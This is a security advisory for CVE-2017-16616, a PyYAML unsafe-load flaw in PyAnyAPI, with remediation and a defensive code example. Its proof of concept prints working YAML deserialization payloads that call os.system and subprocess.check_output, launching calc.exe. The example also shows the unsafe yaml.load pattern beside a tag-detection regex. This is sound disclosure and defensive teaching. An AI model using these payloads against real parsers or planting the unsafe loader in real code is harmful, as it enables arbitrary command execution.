CVE-2017-16616: YAMLParser in PyAnyAPI

Python Package:  PyAnyAPI

Version:      Before 0.6.1

Published:    Nov. 7th, 2017

Reported by:       Joel

CVE ID:       CVE-2017-16616 (CVE Details)

Overview

PyAnyAPI is a library for creating convenient interfaces over various types of data in a declarative way. An issue was discovered in the pyanyapi package before 0.6.1: the YAML parser passes untrusted data to yaml.load() without a safe loader, so Python-specific tags such as !!python/object/apply and !!python/object/new are honoured while the document is parsed. A crafted document can therefore instantiate arbitrary Python objects and call arbitrary callables (os.system, subprocess.check_output, ...), resulting in code and command execution.

POC

from pyanyapi import YAMLParser

# Vulnerable versions (< 0.6.1) hand the raw document to yaml.load(), so the
# !!python/object tags are honoured and the named callable runs as a side
# effect of parsing, regardless of what the 'container > test' selector
# returns. Both payloads launch calc.exe on a Windows host.
YAMLParser({'test': 'container > test'}).parse('!!python/object/apply:os.system ["calc.exe"]').test
YAMLParser({'test': 'container > test'}).parse('!!python/object/new:subprocess.check_output [["calc.exe"]]').test

Remediation

PyAnyAPI 0.6.1 switched to yaml.safe_load(), which only constructs plain YAML types (scalars, sequences and mappings) and raises a ConstructorError on !!python/ tags, so an untrusted document can no longer trigger code execution. Code that calls PyYAML directly should do the same: parse untrusted input with yaml.safe_load() (or yaml.load(..., Loader=yaml.SafeLoader)) and never with the full Loader.
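The following is an added example, not code from the advisory or from PyAnyAPI. It puts the vulnerable yaml.load() pattern next to the yaml.safe_load() fix and adds a cheap pre-parse check that flags PyYAML's python/* tags in untrusted input (defence in depth, not a replacement for safe_load). The sample documents are constructed here from the POC payloads above plus one benign document; the function names are the example's own. The contrast is shown with the harmless tag !!python/tuple rather than os.system so the script is safe to run.

```python
"""Added example (not from the advisory or PyAnyAPI): vulnerable yaml.load()
beside the yaml.safe_load() fix, plus a scanner for PyYAML python/* tags."""
import re

try:
    import yaml  # PyYAML; optional so the tag scanner still runs without it
except ImportError:
    yaml = None

# Constructed sample inputs: the two payloads from the POC and a benign document.
PAYLOADS = [
    '!!python/object/apply:os.system ["calc.exe"]',
    '!!python/object/new:subprocess.check_output [["calc.exe"]]',
]
BENIGN_DOC = "container:\n  test: hello\n"

# Both the short form "!!python/..." and the long form
# "!<tag:yaml.org,2002:python/...>" resolve to constructors that build
# arbitrary Python objects and, via object/apply and object/new, call
# arbitrary callables while the document is being loaded.
PYTHON_TAG = re.compile(r"!!python/|!<tag:yaml\.org,2002:python/")


def contains_python_tag(text):
    """Defence in depth: reject input carrying python/* tags before parsing."""
    return bool(PYTHON_TAG.search(text))


def vulnerable_parse(text):
    """What pyanyapi < 0.6.1 effectively did: yaml.load() with the full Loader.

    Never call this on untrusted input; it is here only to show the contrast.
    """
    return yaml.load(text, Loader=yaml.Loader)


def safe_parse(text):
    """What 0.6.1 does: safe_load() only builds scalars, lists and dicts.

    A python/* tag makes it raise ConstructorError (a YAMLError subclass),
    which is turned into None so the caller can reject the document.
    """
    try:
        return yaml.safe_load(text)
    except yaml.YAMLError:
        return None


if __name__ == "__main__":
    for doc in PAYLOADS + [BENIGN_DOC]:
        print(repr(doc), "-> python tag:", contains_python_tag(doc))
    if yaml is not None:
        # Harmless python/* tag: the full Loader honours it, safe_load refuses it.
        print(vulnerable_parse("!!python/tuple [1, 2]"))  # (1, 2)
        print(safe_parse("!!python/tuple [1, 2]"))        # None
        print(safe_parse(BENIGN_DOC))                     # {'container': {'test': 'hello'}}
```

The scanner is a quick pre-filter for logging or rejecting obviously hostile documents; the actual control is safe_parse(), which refuses the tags at construction time no matter how they are spelled.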